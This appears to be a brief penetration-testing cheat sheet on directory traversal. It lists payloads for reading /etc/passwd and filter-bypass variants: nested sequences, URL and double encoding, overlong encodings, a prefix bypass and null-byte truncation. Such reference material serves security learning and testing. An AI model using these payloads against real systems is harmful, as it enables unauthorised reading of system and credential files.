Directory traversal
A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.
-- Wikipedia
Attacks
Traversal sequence (dot dot slash)
For each ../
you step up one directory. Just repeat this until you are in the root directory and then build up the path to the desired file from there.
../../../etc/passwd
Absolute path
Sometimes you can just supply an absolute path.
/etc/passwd
Bypass filters
Nested traversal sequences
When the traversal seqence is only stripped once and not recursively, you can use nested sequences, so that after stripping the inner one, there will still remain a traversal sequence, so ....//
becomes ../
.
....//....//....//etc/passwd
URL encoding
Single URL encoding
%2e%2e%2f
Double URL encoding (the %
-char is also encoding, as %25
)
%252e%252e%252f
Non-standard encodings
..%c0%af
..%ef%bc%8f
Mandatory prefix
If the app checks for a specific prefix, you may still be able to add traversal sequences to the file path.
/var/www/images/../../../etc/passwd
Null byte termination
E.g. if the app checks for certain file extensions, you may be able to bypass the filter, by supplying a null byte %00
and therefore termine the string early.
../../../etc/passwd%00.jpg
Last updated